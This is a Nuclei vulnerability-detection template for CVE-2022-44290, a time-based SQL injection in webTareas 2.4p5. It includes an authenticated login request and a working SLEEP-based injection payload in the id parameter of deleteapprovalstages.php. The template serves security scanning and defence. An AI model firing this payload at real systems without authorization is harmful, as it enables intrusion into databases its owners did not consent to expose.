WebTareas 2.4p5 - SQL Injection
ID: CVE-2022-44290
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project
Description
webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
YAML Source
id: CVE-2022-44290

info:
  name: WebTareas 2.4p5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.
  reference:
    - http://webtareas.com/
    - https://github.com/anhdq201/webtareas/issues/2
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44290
    - http://webtareas.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44290
    cwe-id: CWE-89
    epss-score: 0.0091
    epss-percentile: 0.82781
    cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: webtareas_project
    product: webtareas
  tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project

http:
  - raw:
      - |
        POST /general/login.php?session=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525

        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="action"

        login
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginForm"

        {{username}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="passwordForm"

        {{password}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginSubmit"

        Log In
        -----------------------------3023071625140724693672385525--
      - |
        @timeout: 20s
        GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body, 'Delete the following?')
        condition: and
# digest: 4a0a0047304502210086a81bce06977943c1aa4063e89f1ae5e920fb719740c9db9704e085b88df290022031ad2b523d58e0c08b749c6bb1f2c6991e6df48fde99ba8021b6b91013d10dea:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-44290.yaml"